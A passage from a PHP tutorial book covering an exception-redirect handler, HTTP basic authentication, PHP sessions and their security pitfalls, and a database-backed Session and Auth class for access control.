As its name implies, ExceptionRedirectHandler::handle will be used as an exception handler. It instantiates its own class, logs the exception, clears the output buffers, and then redirects to the page indicated in the $redirect property.

Several other HTTP headers are specified as well. We output an HTTP status code of 307, which indicates to the browser that the redirect is only temporary. Additionally, Cache-Control and Expires are set in such a way that any subsequent visit to the page will force the browser to refresh the content and, with any luck, display the intended content instead of an error.

Logging is implemented using PHP’s error_log, to which we specify a file argument:

        public function log()
        {
            error_log(
                $this->_exception->getTraceAsString(),
                3,
                $this->_logFile
            );
        }
    }

The actual message that’s logged is the exception’s backtrace. If you’re testing this code, be sure to put the appropriate path and filename in the $_logFile property.

And the final step, of course, tells PHP that our class’s static method will be handling the exceptions:

    set_exception_handler(array('ExceptionRedirectHandler', 'handle'));
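Since the redirect can only succeed if no output has reached the browser, a handler might check headers_sent before attempting it. The following is a minimal sketch of that idea, not part of the class above: the function name redirectToErrorPage and the fallback message are assumptions, and the status code is passed through header's third argument instead of a separate status line.

```php
<?php
// Hypothetical helper: attempt the redirect and report whether it was possible.
function redirectToErrorPage($url)
{
    if (headers_sent($file, $line)) {
        // Output has already started, so a Location header can no longer be sent.
        error_log("Redirect skipped: output started at $file:$line");
        return false;
    }
    // The third argument sets the HTTP response code alongside the header.
    header('Location: ' . $url, true, 307);
    return true;
}

if (redirectToErrorPage('http://www.example.com/error')) {
    // A real handler would call exit at this point.
} else {
    // Fallback when redirecting is no longer possible.
    echo 'An error occurred; please try again later.';
}
```

With a fallback like this, a missing ob_start call degrades to a plain error message instead of a "headers already sent" warning.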
Discussion

When it’s combined with the solution shown in “How can I handle PHP errors as if they were exceptions?”, the strategy I’ve outlined here will allow you to handle PHP errors and exceptions gracefully, and to prevent issues associated with re-propagating the conditions when users accidentally (or deliberately) refresh the page. By redirecting users, you can ensure that if they refresh the page, they’ll remain on the same error page. You can even take such steps as setting a session cookie to prevent them from going back to the offending page, if you wish.

If you use this method, I recommend that you redirect your application’s users to a page that loads a minimal amount of code, perhaps even a static page, to avoid the situation in which environmental errors, such as database connectivity or template directory permissions, prevent error display. Regardless of what else the error page displays, it should provide, as a minimum, the basic navigational elements found on the rest of your site.

Summary

In this chapter, we took a look at the variety of options PHP offers for error handling. PHP’s error level constants were discussed, as was the behavior you can expect from each level. We then turned to look at the built-in mechanisms that PHP offers for handling error conditions automatically: the mechanisms we reviewed included displaying and logging errors. Since PHP offers standard mechanisms for error handling, you may want to be able to trigger errors of your own, a topic that was discussed in detail. While error handling can be automated through the PHP interpreter itself, sometimes it’s useful to be able to handle errors yourself, so that you can undertake such tasks as logging, recovery, and more; to this end, we discussed how to write and use custom error handlers.

PHP 5 introduced a new error mechanism in the form of exceptions. All PHP 5 exceptions derive from a single internal class called Exception.
We discussed how exceptions bubble up through the code until they’re caught, and investigated the use of try {…} catch (Exception $e) {…} blocks for this purpose. Additionally, we created an exception handler to handle uncaught exceptions.
Since exceptions are so easy to deal with, and since they allow code flow to continue from the point at which they’re caught, you may want to throw your PHP errors as exceptions, as I explained in this chapter.

Finally, we saw how easy it is, after an error or exception is handled, to display graceful error pages that avoid presenting sensitive system information to your users. An alternative, redirecting the users to an error page, was also discussed.

This chapter has provided a solid grounding to help you develop a professional approach to managing errors in your PHP scripts. But don’t stop there! The PHP manual has even more information to help you as you improve your PHP practices.
Chapter 10
Access Control

One of the realities of building your site with PHP, as opposed to plain old HTML, is that you build dynamic web pages rather than static web pages. Making the choice to develop your site with PHP will allow you to achieve results that aren’t possible with plain HTML. But, as the saying goes, with great power comes great responsibility. How can you ensure that only you, or those to whom you give permission, are able to view and interact with your web site, while it remains safe from the Internet’s evil hordes as they run riot, spy on private information, or delete data?

In this chapter, we’ll look at the mechanisms you can employ with PHP to build authentication systems and control access to your site. I can’t stress enough the importance of a little healthy paranoia in building web-based applications. The SitePoint Forums frequently receive visits from unhappy web site developers who have had their fingers burned when it came to the security of their sites.

Data Transmission Over the Web is Insecure

Before we go any further into discussing any specific site security topics, you must be aware that any system you build that involves the transfer of data from a web page over the Internet will send that information in clear text by default
(unless you’re using HTTPS, which encrypts the data). This potentially enables someone to “listen in” on the network between the client’s web browser and the web server; with the help of a tool known as a packet sniffer, they’ll be able to read the username and password sent via your form, for example. The chance of this risk eventuating is fairly small, as typically only trusted organizations like ISPs have the access required to intercept packets; however, it is a risk, and it’s one you should take seriously.

About the Examples in this Chapter

Before we dive in, I need to let you know about the example solutions discussed in this chapter.

The example classes in some of these solutions require the use of a configuration file: access_control.ini. This file is used to store various database table names and column names used in the examples. Since not everyone names their database tables in the same way, configuration values like these are often intended to be customizable. The access_control.ini file is read into an array using the PHP parse_ini_file function (you can read more about this technique in “How do I store configuration information in a file?” in Chapter 6). The configuration file looks like this:

access_control.ini (excerpt)

    ; Access Control Settings

    ;web form variables e.g. $_POST['login']
    [login_vars]
    login=login
    password=password
    ⋮ more settings follow…

When an example uses configuration information from this file, that will be indicated within the section.

Similarly, the solutions below assume a certain database configuration. The SQL details relevant to each solution are indicated in the text where appropriate.

If you’ve downloaded the code archive for this book from the SitePoint web site, you’ll find a file called access_control_dump.sql in the folder for this chapter. You can use this file to create the database and insert some sample data. Using this
file is identical to using the world database in Chapter 2. The instructions found at http://dev.mysql.com/doc/world-setup/en/world-setup.html can be used to create the access_control database too, like so:

    command prompt> mysql -u root -p
    mysql> CREATE DATABASE access_control;
    mysql> USE access_control;
    mysql> SOURCE access_control_dump.sql;

Of course, you’ll have to add the missing path and password information as appropriate for your system.

Finally, all these solutions use the PDO class to make the connection to the database. For more information about using the PDO class, see Chapter 2. All the solutions involving web page forms use the PEAR HTML_QuickForm package. You can read more about using this package in “How do I build HTML forms with PHP?” in Chapter 5.

How do I use HTTP authentication?

Hypertext Transfer Protocol, or HTTP, is the transfer protocol used to send web pages over the Internet to your web browser, and it defines its own authentication mechanisms. These mechanisms, basic and digest authentication, are explained in RFC 2617 [1]. If you run PHP on an Apache server, you can take advantage of these mechanisms (digest is available from PHP version 5.1.0) using PHP’s header function and a couple of predefined variables. A general discussion of these features is provided in the Features section of The PHP Manual [2].

HTTP Authentication and Apache

If you wish to use HTTP authentication on your web site, you can set it up using only the Apache configuration settings; PHP is not required. For more information on how to do this, see the Apache documentation for your server version [3].

[1] http://www.ietf.org/rfc/rfc2617
[2] http://www.php.net/manual/en/features.http-auth.php
[3] For example, the documentation for version 2.2 can be found at http://httpd.apache.org/docs/2.2/howto/auth.html.
Solution

Let’s step through a simple example page that uses the $_SERVER['PHP_AUTH_USER'] and $_SERVER['PHP_AUTH_PW'] automatic global variables and the WWW-Authenticate HTTP header to protect itself. If the current user is not in a list of allowed users, access is denied.

First, we need a list of valid usernames and passwords. For the purpose of this simple demonstration, we’ll just use an array, but this would not be advisable for a real-world situation where you’d likely use a database (which we’ll see in “How do I build a registration system?”). Here’s the $users array:

httpAuth.php (excerpt)

    <?php
    $users = array(
        'jackbenimble' => 'sekret',
        'littlepig'    => 'chinny'
    );

Next, we test for the presence of the automatic global variable $_SERVER['PHP_AUTH_USER']. If the variable is not set, a username hasn’t been submitted and we need to make an appropriate response: an HTTP/1.1 401 Unauthorized response code, together with a WWW-Authenticate header to indicate that we require basic authentication:

httpAuth.php (excerpt)

    if (!isset($_SERVER['PHP_AUTH_USER'])) {
        header('HTTP/1.1 401 Unauthorized');
        header('WWW-Authenticate: Basic realm="PHP Secured"');
        exit('This page requires authentication');
    }

If a username has been submitted, we need to check that the username exists in our list of valid usernames, then ensure that the submitted password matches the one associated with the username in our list:
httpAuth.php (excerpt)

    if (!isset($users[$_SERVER['PHP_AUTH_USER']])) {
        header('HTTP/1.1 401 Unauthorized');
        header('WWW-Authenticate: Basic realm="PHP Secured"');
        exit('Unauthorized!');
    }
    // Strict comparison avoids PHP's loose type juggling between strings
    if ($users[$_SERVER['PHP_AUTH_USER']] !== $_SERVER['PHP_AUTH_PW']) {
        header('HTTP/1.1 401 Unauthorized');
        header('WWW-Authenticate: Basic realm="PHP Secured"');
        exit('Unauthorized!');
    }

Finally, if all our checks pass muster, we can proceed to display the web page. In this example, we simply display the credentials we’ve received from the authentication form. Of course, this output is for demonstration purposes only; you’d never do this in a real situation:

httpAuth.php (excerpt)

    echo 'You\'re in! Your credentials were:<br />';
    echo 'Username: ' . $_SERVER['PHP_AUTH_USER'] . '<br />';
    echo 'Password: ' . $_SERVER['PHP_AUTH_PW'];
    ?>

Discussion

To understand how HTTP authentication works, you must first understand what actually happens when your browser sends a web page request to a web server.

HTTP is the protocol for communication between a browser and a web server. When your browser sends a request to a web server, it uses an HTTP request to tell the server which page it wants. The server then replies with an HTTP response that describes the type and characteristics of the document being sent, then delivers the document itself.

For example, a client might send the following request to a server:
    GET /subcat/98 HTTP/1.1
    Host: www.sitepoint.com

Here’s what it might receive from the server in return:

    HTTP/1.1 200 OK
    Date: Sat, 24 Mar 2007 08:12:44 GMT
    Server: Apache/2.0.46 (Red Hat)
    X-Powered-By: PHP/4.3.11
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=ISO-8859-1

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
    <head>
    <title>PHP &amp; MySQL Tutorials</title>
    ⋮ and so on…

If you’d like to see this process in action, the next example will give you the chance, as we open a connection to www.sitepoint.com and request /subcat/98 [4]. The example script will read the response from the server and output the complete HTTP response for you:

seeHeaders.php

    <?php
    // Connect to sitepoint.com
    $fp = fsockopen('www.sitepoint.com', 80);

    // Send the request; each header line ends with CRLF,
    // and a blank line marks the end of the headers
    fputs($fp, "GET /subcat/98 HTTP/1.1\r\nHost: www.sitepoint.com\r\n\r\n");

    // Fetch the response
    $response = '';
    while (!feof($fp)) {
        $response .= fgets($fp, 128);
    }

[4] We use sockets in this example to illustrate the passing of the HTTP headers. You can use any of a multitude of alternative methods to get the contents of the page itself, from file_get_contents to fopen, fread, and fclose. For more information, see Chapter 6.
    fclose($fp);

    // Convert HTML to entities
    $response = htmlspecialchars($response);

    // Display the response
    echo nl2br($response);
    ?>

Authentication headers are additional headers sent by a server to instruct the browser that it must send a valid username and password in order to view the page.

In response to a normal request for a page secured with basic HTTP authentication, a server might respond with headers like these:

    HTTP/1.1 401 Authorization Required
    Date: Tue, 25 Feb 2003 15:41:54 GMT
    Server: Apache/1.3.27 (Unix) PHP/4.3.1
    X-Powered-By: PHP/4.3.1
    WWW-Authenticate: Basic realm="PHP Secured"
    Connection: close
    Content-Type: text/html

No further information is sent, but notice the status code HTTP/1.1 401 Authorization Required and the WWW-Authenticate header. Together, these HTTP response elements indicate that the page is protected by HTTP authentication, and isn’t available to an unauthorized user. A visitor’s browser can convey this information in a variety of ways, but usually the user will see a small popup like that shown in Figure 10.1.

Figure 10.1. The Authentication Required dialog
The dialog prompts site visitors to enter their usernames and passwords. After visitors using Internet Explorer have entered these login details incorrectly three times, the browser displays the “Unauthorized” message instead of displaying the prompt again. In other browsers, such as Opera, users may be able to continue to try to log in indefinitely.

Notice that the realm value specified in the WWW-Authenticate header is displayed in the dialog. A realm is a security space or zone within which a particular set of login details are valid. Upon successful authentication, the browser will remember the correct username and password combination, and automatically resend it with any future request to that realm. When the user navigates to another realm, however, the browser displays a fresh prompt once again.

In any case, the user must provide a username and password to access the page. The browser sends those credentials with a second page request like this:

    GET /admin/ HTTP/1.1
    Host: www.sitepoint.com
    Authorization: Basic jTSAbT766yN0hGjUi

The Authorization header contains the username and password encoded with base64 encoding which, it’s worth noting, isn’t secure: it’s unreadable for humans, but it’s a trivial task to convert base64-encoded values back to the original text.

The server will check to ensure that the credentials are valid. If they’re not, the server will send the HTTP/1.1 401 Authorization Required response again, as shown previously. If the credentials are valid, the server will send the requested page as normal.

A package you should consider if you expect to use HTTP authentication a lot is the Auth_HTTP package available from PEAR [5]. Auth_HTTP provides an easy-to-use API so that you don’t have to worry about handling the header calls yourself.

Sending Headers

In PHP, the moment your script outputs anything that’s meant for display, the web server finishes sending the headers and begins to send the content itself.
You cannot send further HTTP headers once the output of the body of the HTTP message (the web page itself) has commenced. If you do use the header or session_start functions after the rendering of the body has begun, you’ll see an error message like this:

    Warning: Cannot add header information - headers already sent by (output started at…

Remember, any text or whitespace outside the <?php … ?> tags causes output to be sent to the browser. If you have whitespace before a <?php tag or after a ?> tag, you won’t be able to send headers to the browser beyond that point.

[5] You can view the package’s information at http://pear.php.net/Auth_HTTP/.

How do I use sessions?

Sessions are a mechanism that allows PHP to preserve state between executions. In simple terms, sessions allow you to store variables from one page (the state of that page) and use them on another. For example, if a visitor submits his first name, Bob, via a form on your site, sessions will allow your site to remember his name, and allow you to place personal messages such as “Where would you like to go today, Bob?” on all the other pages of your site for the duration of his visit. Don’t be surprised if Bob leaves rather quickly, though!

The basic mechanism of sessions works like this: first, PHP generates a unique, 32-character string to identify the session. PHP then passes the value to the browser; simultaneously, it creates a file on the server and includes the session ID in the filename. There are two methods by which PHP can keep track of the session ID: it can add the ID to the query string of all relative links on the page, or send the ID as a cookie. Within the file that’s stored on the server, PHP saves the names and values of the variables it’s been told to store for the session.

When the browser makes a request for another page, it tells PHP which session it was assigned via the URL query string, or by returning the cookie.
PHP then looks up the file it created when the session was started, and so has access to the data stored within the session. Once the session has been established, it’ll continue until it’s specifically destroyed by PHP (in response to a user clicking Log out, for example), or the session has been inactive for longer than a given period of time (as specified in your php.ini file under
session.gc_maxlifetime). At this point it becomes flagged for garbage collection and will be deleted the next time PHP checks for outdated sessions.

Solution

Here’s a very simple demonstration of storing and retrieving a session variable:

simpleSession.php

    <?php
    session_start();

    // If session variable doesn't exist, register it
    if (!isset($_SESSION['test'])) {
        $_SESSION['test'] = 'Hello World!';
        echo '$_SESSION[\'test\'] is registered.<br />' .
            'Please refresh page';
    } else {
        // It's registered so display it
        echo '$_SESSION[\'test\'] = ' . $_SESSION['test'];
    }
    ?>

The script registers the session variable test the first time the page is displayed. The next time (and all times thereafter, until the session times out through inactivity), the script will display the value of the test session variable.

Discussion

In general, sessions are easy to use and powerful; they’re an essential tool for building online applications. The first order of business in a script that uses sessions is to call session_start to load any existing session variables.

You should always access session variables via the predefined global variable $_SESSION, not the functions session_register and session_unregister. session_register and session_unregister fail to work correctly when PHP’s register_globals setting has been disabled, which should always be the case.

In the following HTTP response headers, a server passes a session cookie to a browser as a result of the session_start function in a PHP script:
    HTTP/1.1 200 OK
    Date: Wed, 26 Feb 2003 02:23:08 GMT
    Server: Apache/1.3.27 (Unix) PHP/4.3.1
    X-Powered-By: PHP/4.3.1
    Set-Cookie: PHPSESSID=ce558537fb4aefe349bb8d48c5dcc6d3; path=/
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    ⋮ and so on…

Storing Sessions Elsewhere

Notice that I’ve said sessions are stored, by default, on the server as files. It’s also possible to store sessions elsewhere, such as in a database or even shared memory. We’ll discuss creating a custom session handler for saving the session variables to a database in “How do I store sessions in a database?”. Storing sessions in a database can be useful for displaying “who’s online” information, and for load-balancing multiple web servers using a single session repository, a mechanism that allows visitors to (unknowingly) swap servers while their session is maintained.

Sessions Aren’t Perfect

While sessions are a wonderful tool, they can easily cause headaches if you don’t understand their limitations. Take care when you handle data that’s relevant to the session state. For example, when users open multiple windows for a site, a script executed in one window may overwrite data saved from another, rolling back a user to an earlier state in the site.

Also be aware that resource handles and references are not saved with an object in the session; you need to release and recreate them in the __sleep and __wakeup methods of your classes [6]. Also, try to keep the amount of data in the session variables to a minimum, as pulling large chunks of data that aren’t used for every page may slow the pages down.

[6] __sleep and __wakeup are examples of magic methods, and are explained at http://www.php.net/manual/en/language.oop5.magic.php.
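To make the point about resources concrete, here is a minimal sketch of a class that releases a file handle in __sleep and reopens it in __wakeup. The LogWriter class and the log file name are hypothetical, and serialize/unserialize stand in for what PHP does when it saves and restores an object held in a session.

```php
<?php
// Hypothetical class holding a resource that cannot survive serialization.
class LogWriter
{
    protected $path;
    protected $handle; // file resource; cannot be stored in a session

    public function __construct($path)
    {
        $this->path = $path;
        $this->open();
    }

    protected function open()
    {
        $this->handle = fopen($this->path, 'a');
    }

    public function __sleep()
    {
        // Release the resource and list only the properties worth saving.
        if (is_resource($this->handle)) {
            fclose($this->handle);
        }
        return array('path');
    }

    public function __wakeup()
    {
        // Recreate the resource when the object is restored.
        $this->open();
    }

    public function isOpen()
    {
        return is_resource($this->handle);
    }
}

// serialize()/unserialize() mimic the session save and load cycle.
$writer   = new LogWriter(sys_get_temp_dir() . '/session_demo.log');
$restored = unserialize(serialize($writer));
```

Note that in this sketch the original object's handle is closed by __sleep, so only the restored copy should be used afterwards.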
Session Security

Sessions are very useful, but there are some important security considerations you should take into account when you use sessions in your applications.

By default, all a browser has to do to gain control of a session is pass a valid session ID to PHP. In an ideal world, you could store the IP address that registered the session, and double-check it against every new request that used the associated session ID. Unfortunately, some ISPs, such as AOL, assign their users a new IP on almost every page request, so this type of security mechanism would soon start to throw valid users out of the system.

As such, it’s important to design your application in a manner that assumes that one of your users will eventually have his or her session “hijacked.” The user’s account is exposed until the session expires, so your aim should be to prevent the hijackers from causing serious damage while the session is active. This means, for example, that when a logged-in user goes to change his or her account password, the old password must be provided, since hijackers won’t know it. Also, be careful with the way you handle the users’ personal information (such as credit card details). If you give users the opportunity to make significant changes to their account details, such as changing a shipping address, be sure to send a summary notification of that change to them via email to alert users whose sessions may have been hijacked.

Keep the session ID completely hidden, using SSL (secure sockets layer) to encrypt the conversation. What’s more, you should only use the cookie method of passing the session ID. If you pass it in the URL, you might give away the session ID upon referring the visitor to another site, thanks to the referer header in the HTTP request.

The files PHP creates for the purpose of storing session information are, by default, stored in the temporary directory of the operating system under which PHP is running.
On Unix-based systems such as Linux, this directory will be /tmp. And, if you’re on a shared server, the session files from all the hosted sites will be stored together, which means that other users on the server can read the files’ contents. They might not be able to identify which virtual host and PHP script are the owners of the session but, depending on the information you place there, they might be able to guess.
This possibility is a serious cause for concern on shared PHP systems; the most effective solution is to store your sessions in a database, rather than in the server’s temporary directory. We’ll look more closely at custom session handlers later in this chapter, but a partial solution is to set the session.save_path option in your php.ini to a directory that’s not available to the public. You’ll need to contact your hosting company in order to have the correct permissions set for that directory, so that the nobody or wwwuser user with which PHP runs has access to read, write, and delete files in that directory.

One final warning: with the help of a common web security exploit, cross-site scripting, or XSS, it’s possible for an attacker to place JavaScript on your site that will cause visitors to give away their session IDs to a remote web site, thereby allowing their sessions to be hijacked. If you allow your visitors to post any HTML to your site, make sure you check and validate it very carefully.

Remember the golden rules: never rely on client-side technologies (such as JavaScript) to handle security, and never trust any content submitted from a browser.

How do I create a session class?

You can make a simple wrapper class to handle your sessions. Doing so ensures that if you ever want to switch to an alternative session-handling mechanism, such as one you’ve built yourself, you simply need to modify the class rather than rewriting a lot of code. We can provide an interface to the $_SESSION variable with a few simple methods.

Solution

Our custom Session class begins with the constructor method that simply calls session_start:

Session.class.php (excerpt)

    class Session
    {
        public function __construct()
        {
            session_start();
        }
We can then add the set and get methods to set a session variable and get a session variable, respectively:

Session.class.php (excerpt)

        public function set($name, $value)
        {
            $_SESSION[$name] = $value;
        }
        public function get($name)
        {
            if (isset($_SESSION[$name])) {
                return $_SESSION[$name];
            } else {
                return false;
            }
        }

Finally, we add a del method to delete a session variable, and the destroy method to remove all session variables and reset the session:

Session.class.php (excerpt)

        public function del($name)
        {
            unset($_SESSION[$name]);
        }
        public function destroy()
        {
            $_SESSION = array();
            // Issue the new ID while the session is still active;
            // session_regenerate_id does nothing once the session is destroyed
            session_regenerate_id(true);
            session_destroy();
        }
    }
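To illustrate why the wrapper is worth having, here is a small sketch of a stand-in with the same four methods, backed by a plain array rather than $_SESSION. The names ArraySession and greeting are invented for this illustration and are not part of the book’s code; the point is only that calling code which sticks to set, get, del, and destroy does not care which storage sits behind them.

```php
<?php
// Hypothetical stand-in for Session: same method names, but backed by a
// plain array instead of $_SESSION, so no session_start() call is needed.
class ArraySession
{
    private $data = array();

    public function set($name, $value)
    {
        $this->data[$name] = $value;
    }

    public function get($name)
    {
        // Mirrors Session::get(): false when the variable is not set
        return isset($this->data[$name]) ? $this->data[$name] : false;
    }

    public function del($name)
    {
        unset($this->data[$name]);
    }

    public function destroy()
    {
        $this->data = array();
    }
}

// Calling code relies only on the wrapper's methods, so it works with
// either the real Session class or the stand-in.
function greeting($session)
{
    $name = $session->get('name');
    return $name === false ? 'Hello, guest' : 'Hello, ' . $name;
}

$session = new ArraySession();
$before = greeting($session);       // nothing stored yet
$session->set('name', 'Kim');
$after = greeting($session);        // value stored
$session->del('name');
$afterDelete = greeting($session);  // value removed again
```

A stand-in like this can be handy for command-line tests, where starting a real session is awkward.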
How do I create a class to control access to a section of the site?

Now we reach the business end of access control. Let’s look at a class that controls who’s permitted access to those private sections of your site. This class uses a database to hold the access credentials and works with an HTML login form.

Solution

The Auth class wraps login, session storage, and logout functionality in a simple, easy-to-use PHP class.

The Auth Class

The Auth class uses the following configuration settings:

access_control.ini (excerpt)

    ; Access Control Settings

    ;web form variables e.g. $_POST['login']
    [login_vars]
    login=login
    password=password
    hash=login_hash

    ;user login table details
    [users_table]
    table=user
    col_login=login
    col_password=password

The first two settings reflect the names of the username and password fields that will appear on the login form we’ll build in a moment. They’ll match the names of the $_POST variables submitted by the form: $_POST['password'], for example. The hash setting names the session variable in which the class stores its verification hash. The next three settings provide details of the table in which user information is stored: the name of the table, and the names of the username and password columns in the table.
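As a quick illustration of how these settings end up in PHP, the sketch below parses the same configuration with sections enabled. It uses parse_ini_string (the string counterpart of parse_ini_file) purely so the example is self-contained; the variable names are chosen for this illustration.

```php
<?php
// The same settings as access_control.ini, inlined as a string for the demo
$ini = <<<'INI'
; Access Control Settings
[login_vars]
login=login
password=password
hash=login_hash

[users_table]
table=user
col_login=login
col_password=password
INI;

// Second argument true = keep the [section] names as the first array level
$cfg = parse_ini_string($ini, true);

$loginField  = $cfg['login_vars']['login'];  // name of the $_POST field
$hashKeyName = $cfg['login_vars']['hash'];   // session variable for the hash
$table       = $cfg['users_table']['table']; // table that holds the users
```

Each section becomes a nested array, which is why the class code reads values such as $this->cfg['users_table']['col_login'].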
The database table user will be used in all the solutions in this section. Here’s the SQL for the table:

access_control.sql (excerpt)

    CREATE TABLE user (
      user_id INT(11) NOT NULL AUTO_INCREMENT,
      login VARCHAR(50) NOT NULL DEFAULT '',
      password VARCHAR(50) NOT NULL DEFAULT '',
      email VARCHAR(50) DEFAULT NULL,
      firstName VARCHAR(50) DEFAULT NULL,
      lastName VARCHAR(50) DEFAULT NULL,
      signature TEXT NOT NULL,
      PRIMARY KEY (user_id),
      UNIQUE KEY user_login (login)
    );

The Auth class body begins with the class properties:

Auth.class.php (excerpt)

    class Auth
    {
        protected $db;
        protected $cfg;
        protected $session;
        protected $redirect;
        protected $hashKey;

The $db property will store an instance of our DB connection class, while the $cfg property will store the configuration settings. The $session property will store an instance of the Session class we created in “How do I create a session class?”. The $redirect property will store a URL to which visitors will be redirected if they aren’t logged in, or if their usernames or passwords are incorrect; this might be a login form, for example. The $hashKey property is a seed we provide to double-check the usernames and passwords of users who are already logged in. I’ll explain this in more detail later.

Now we can create the constructor method of our Auth class:
Auth.class.php (excerpt)

        function __construct(PDO $db, $redirect, $hashKey)
        {
            $this->db = $db;
            $this->cfg = parse_ini_file('access_control.ini', TRUE);
            $this->redirect = $redirect;
            $this->hashKey = $hashKey;
            $this->session = new Session();
            $this->login();
        }

The constructor requires a $db parameter that accepts an instance of the PDO class (although you can alter it to a custom class; just be sure to adjust the database interaction areas as required for your class). The $redirect parameter is a URL string and the $hashKey parameter is a string.

In the constructor, we set the Auth instance variables, load the configuration file, and create a new instance of the Session class, which we store in the $session property; finally, we call the login method to validate the user against the database.

The login method checks the user’s login credentials:

Auth.class.php (excerpt)

        private function login()
        {
            $var_login = $this->cfg['login_vars']['login'];
            $var_pass = $this->cfg['login_vars']['password'];
            $user_table = $this->cfg['users_table']['table'];
            $user_login = $this->cfg['users_table']['col_login'];
            $user_pass = $this->cfg['users_table']['col_password'];
            if ($this->session->get('login_hash')) {
                $this->confirmAuth();
                return;
            }
            if (!isset($_POST[$var_login]) || !isset($_POST[$var_pass])) {
                $this->redirect();
            }
The configuration settings are assigned to local variables for the sake of readability. The login method first checks to see whether login details (specifically, the login_hash value) are currently stored in the session; if they are, it calls the confirmAuth method. If they are not stored in the session, the method checks to see whether username and password values are available in the $_POST array; if they’re not, the method calls the redirect method.

Assuming the script has found the $_POST values, it calls the md5 function to get a digest for the password:

Auth.class.php (excerpt)

            $password = md5($_POST[$var_pass]);

We use the MD5 algorithm to store the password for security reasons, either in the session or on the database, because we don’t want to leave plain-text passwords lying around.

The MD5 Algorithm

MD5 is a simple message digest algorithm (often referred to as one-way encryption) that translates any string (such as a password) into a short series of ASCII characters called an MD5 digest. A particular string will always produce the same digest, and the digest can’t be reversed directly to recover the string. By storing only the MD5 digest of your users’ passwords in the database, you can verify their login credentials without actually storing the passwords on your server! The built-in PHP function md5 lets you calculate the MD5 digest of any string in PHP. Be aware that MD5 is fast to compute and is no longer considered strong enough for password storage; PHP 5.5 and later provide the password_hash and password_verify functions for this purpose.

The script then performs a query against the database to see if it can find a record to match the submitted username and password:

Auth.class.php (excerpt)

            try {
                $sql = "SELECT COUNT(*) AS num_users " .
                       "FROM " . $user_table .
                       " WHERE " . $user_login . "=:login AND " .
                       $user_pass . "=:pass";
                $stmt = $this->db->prepare($sql);
                $stmt->bindParam(':login', $_POST[$var_login]);
                $stmt->bindParam(':pass', $password);
                $stmt->execute();
                $row = $stmt->fetch(PDO::FETCH_ASSOC);
            }
            catch (PDOException $e) {
                error_log('Error in ' . $e->getFile() .
                    ' Line: ' . $e->getLine() .
                    ' Error: ' . $e->getMessage()
                );
                $this->redirect();
            }
            if ($row['num_users'] != 1) {
                $this->redirect();
            } else {
                $this->storeAuth($_POST[$var_login], $password);
            }
        }

We use the PDO methods prepare and execute to perform the database query, binding our $_POST[$var_login] and $password variables to the SQL parameters :login and :pass respectively. We can’t authenticate the user reliably if a PDOException is thrown, so in that case, we log the error and call the redirect method.

After we fetch the result of the query, we test that there is exactly one matching record. If not, we call the redirect method.

Finally, assuming it has reached this point, the script registers the username and password as session variables by way of the storeAuth method (explained below), which makes them available for future page requests.
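The query logic above can be tried in isolation. The following is a minimal sketch only: it assumes the pdo_sqlite extension is available and uses an in-memory SQLite table in place of the MySQL user table, and credentialsMatch is a hypothetical helper name rather than a method of the Auth class.

```php
<?php
// Assumption: pdo_sqlite is installed; the book's own examples target MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user (login TEXT UNIQUE, password TEXT)');

// Store one user with an MD5 digest, as the Auth class expects
$insert = $db->prepare('INSERT INTO user (login, password) VALUES (:login, :pass)');
$insert->execute(array(':login' => 'alice', ':pass' => md5('s3cret')));

// Hypothetical helper: true only when exactly one row matches both values
function credentialsMatch(PDO $db, $login, $plainPassword)
{
    $stmt = $db->prepare(
        'SELECT COUNT(*) AS num_users FROM user
         WHERE login = :login AND password = :pass'
    );
    // bindValue copies the value at once; bindParam binds a variable by reference
    $stmt->bindValue(':login', $login);
    $stmt->bindValue(':pass', md5($plainPassword));
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return (int) $row['num_users'] === 1;
}

$ok            = credentialsMatch($db, 'alice', 's3cret');
$wrongPassword = credentialsMatch($db, 'alice', 'guess');
// The bound parameter is treated as data, so this is just an unknown login
$injection     = credentialsMatch($db, "alice' OR '1'='1", 's3cret');
```

Because the submitted values are bound as parameters rather than concatenated into the SQL string, the quote characters in the last call have no special effect.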
login and Magic Quotes

One point to note about the login method is that it assumes magic_quotes_gpc is switched off. In the scripts that utilize this class, we’ll need to nullify the effect of magic quotes. You can read more about this task in the section called “Checking for Magic Quotes” in Chapter 1.

The storeAuth method is used to add the username and password digest to the session, along with a special hash value:

Auth.class.php (excerpt)

        public function storeAuth($login, $password)
        {
            $this->session->set($this->cfg['login_vars']['login'], $login);
            $this->session->set($this->cfg['login_vars']['password'], $password);
            $hashKey = md5($this->hashKey . $login . $password);
            $this->session->set($this->cfg['login_vars']['hash'], $hashKey);
        }

This special hash value is composed of a seed value (the $hashKey parameter required by the constructor) as well as the username and password values. As we’ll see in the confirmAuth method below, instead of laboriously checking the database to verify the login credentials whenever a user requests a page, the class simply checks that the current username and password produce a hash value that’s the same as that stored in the session. This approach prevents potential attackers from attempting to change the stored username after login if your PHP configuration has register_globals enabled.

The confirmAuth method is used to double-check credentials stored in the session once a user is logged in:

Auth.class.php (excerpt)

        private function confirmAuth()
        {
            $login = $this->session->get(
                $this->cfg['login_vars']['login']);
            $password = $this->session->get(
                $this->cfg['login_vars']['password']);
            $hashKey = $this->session->get(
                $this->cfg['login_vars']['hash']);
            // Strict comparison: with != two different digests that both look
            // like numbers (for example "0e..." strings) could compare as equal
            if (md5($this->hashKey . $login . $password) !== $hashKey) {
                $this->logout(true);
            }
        }

Notice how we reproduce the hash built by the storeAuth method. If this fails to match the original hash value, the user is immediately logged out.

The logout method is used to remove the login credentials from the session, destroy the session, and return the user to the page URL stored in the $redirect property:

Auth.class.php (excerpt)

        public function logout($from = false)
        {
            $this->session->del($this->cfg['login_vars']['login']);
            $this->session->del($this->cfg['login_vars']['password']);
            $this->session->del($this->cfg['login_vars']['hash']);
            $this->session->destroy();
            $this->redirect($from);
        }

